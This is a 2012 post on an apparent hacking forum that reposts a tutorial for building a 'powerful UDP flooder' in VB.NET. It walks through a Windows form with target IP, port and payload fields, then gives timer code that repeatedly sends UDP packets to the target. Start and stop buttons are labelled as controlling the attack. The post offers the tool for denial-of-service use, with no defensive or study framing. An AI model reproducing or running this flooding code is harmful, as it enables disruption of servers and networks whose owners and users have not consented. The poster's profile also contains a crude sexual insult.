Learn how to hack, join hack teams, post tutorials,
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Welcome
 
HomeLatest imagesSearchRegisterLog in

 

 How To make a powerful UDP flooder

Go down 
AuthorMessage
Shock

Shock


Posts : 3
Join date : 2012-01-01
Age : 32
Location : Your Moms vagina

How To make a powerful UDP flooder Empty
PostSubject: How To make a powerful UDP flooder   How To make a powerful UDP flooder Icon_minitimeSun Jan 01, 2012 2:20 am

I do not own this TUT i am only posting it on this Forums credits to
Onix

Hello Guys This is My First Tutorial on How to Make a Powerful UDP Flooder in VB NET

1) Start By Creating a Windows Form Application


2) Now Add a Textbox1 --> Which is The IP Input
Textbox2 --> Which is The Port Input
Textbox3 --> Which is The Data To Send
ListBox1 --> Which Displays The Server Response
Button1 --> a Button Which Starts The Attack
Button2 --> a Button That Stops The Attack
Timer1 --> To Repeat The Flood

3)Organize Them and Your Form Should Look Like This


ITS TIME FOR CODING NOW

4) Above Public Class Form1 Paste This
Code:
imports System.Net
Imports System.Text
Imports System.Net.Sockets
Imports System.Diagnostics

5)Click on The Timer1 and Paste This Code :
Code:
Try

ListBox1.Items.Add("Attacking " + TextBox1.Text + " With Data ")
ListBox1.Items.Add(My.Computer.Info.AvailableVirtualMemory)
Dim udpClient As New UdpClient
Dim GLOIP As IPAddress
Dim bytCommand As Byte() = New Byte() {}
GLOIP = IPAddress.Parse(TextBox1.Text)
udpClient.Connect(GLOIP, TextBox2.Text)
bytCommand = Encoding.ASCII.GetBytes(TextBox3.text)
udpClient.Send(bytCommand, bytCommand.Length)
ListBox1.SelectedIndex += 1
Catch ex As Exception
Me.Close()
End Try

6)Click on Button1 (Known as Start Flooding) and Paste This Code :
Code:
timer1.start

7)Click on Button2 (Known as Stop Flooding) and Paste This Code :
Code:
timer1.stop

YOU HAVE TO ENTER AN IP AND A PORT (USUALLY 80) OR THE PROGRAM WILL END ITSELF!!

THE MORE DATA YOU PUT IN THE MORE POWERFUL THE UDP FLOODER IS!!

Our UDP flooder in action
dl dropbox com/u/36122539/UDP%20Flooder%20HackForums%20Picture/Screen%20shot%202011-10-10%20at%205 41 09%20PM png
Please put dots where there are spaces
Back to top Go down
 
How To make a powerful UDP flooder
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Learn how to hack, join hack teams, post tutorials, :: Mayhem Forum ™ :: Hacking Tutorials-
Jump to: